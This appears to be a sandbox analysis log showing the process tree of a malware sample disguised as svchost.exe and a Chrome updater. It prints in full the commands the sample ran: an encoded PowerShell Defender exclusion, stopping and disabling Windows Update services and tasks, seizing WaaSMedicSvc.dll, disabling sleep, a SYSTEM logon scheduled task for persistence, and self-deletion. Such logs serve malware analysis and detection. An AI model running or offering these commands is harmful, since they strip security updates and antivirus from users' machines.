C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:5796
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:1020
-
-
C:\Windows\system32\sc.exesc stop wuauserv10⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\system32\sc.exesc stop bits10⤵
- Launches sc.exe
PID:5832
-
-
C:\Windows\system32\sc.exesc stop dosvc10⤵
- Launches sc.exe
PID:5236
-
-
C:\Windows\system32\sc.exesc stop UsoSvc10⤵
- Launches sc.exe
PID:5724
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:3612
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:6036
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:6080
-
-
C:\Windows\system32\sc.exesc config bits start= disabled10⤵
- Launches sc.exe
PID:5988
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5952
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled10⤵
- Launches sc.exe
PID:6104
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5864
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled10⤵
- Launches sc.exe
PID:4532
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:3172
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:5744
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5728
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5260
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4088
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f10⤵PID:2228
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f10⤵PID:6096
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f10⤵PID:912
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f10⤵PID:6128
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f10⤵PID:1580
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f10⤵PID:3064
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE10⤵PID:4524
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE10⤵PID:4444
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE10⤵PID:4080
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE10⤵PID:5408
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE10⤵PID:3124
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE10⤵PID:2548
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE10⤵PID:5360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 09⤵
- Power Settings
PID:2256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4872
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 010⤵
- Power Settings
PID:964
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 010⤵
- Power Settings
PID:5692
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 010⤵
- Power Settings
PID:5720
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 010⤵
- Power Settings
PID:5500
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe9⤵PID:5336
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"10⤵PID:5204
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵PID:2240
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:5888
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:4608
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵PID:2492
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2116
-
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:3724
-
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:3620
-
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:2880
-
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:3176
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:3352
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:1476
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:2548
-
-
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
- Launches sc.exe
PID:4456
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
- Launches sc.exe
PID:372
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
- Launches sc.exe
PID:3520
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:4248
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:4540
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1128
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2992
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵PID:2692
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵PID:5312
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵PID:5408
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵PID:5480
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵PID:5524
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵PID:5612
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵PID:5708
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵PID:5804
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵PID:5900
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵PID:6024
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵PID:6092
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵PID:3348
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:3172 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
PID:2220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵PID:3756
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"6⤵PID:5544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:5284
-
-
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe7⤵
- Executes dropped EXE
PID:5688 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:4044
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:5076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3692
-
-
C:\Windows\system32\sc.exesc stop wuauserv10⤵
- Launches sc.exe
PID:5428
-
-
C:\Windows\system32\sc.exesc stop bits10⤵
- Launches sc.exe
PID:5360
-
-
C:\Windows\system32\sc.exesc stop dosvc10⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\sc.exesc stop UsoSvc10⤵
- Launches sc.exe
PID:372
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:5152
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:5636
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5504
-
-
C:\Windows\system32\sc.exesc config bits start= disabled10⤵
- Launches sc.exe
PID:5564
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5672
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled10⤵
- Launches sc.exe
PID:5784
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5776
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled10⤵
- Launches sc.exe
PID:5940
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5960
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:5132
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5448
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2692
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f10⤵PID:2172
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f10⤵PID:2764
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f10⤵PID:2300
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f10⤵PID:4852
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f10⤵PID:1616
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f10⤵PID:336
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE10⤵PID:3724
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE10⤵PID:1956
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE10⤵PID:1300
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE10⤵PID:3476
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE10⤵PID:908
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE10⤵PID:3128
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE10⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 09⤵
- Power Settings
PID:4660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2472
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 010⤵
- Power Settings
PID:1972
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 010⤵
- Power Settings
PID:5208
-
-
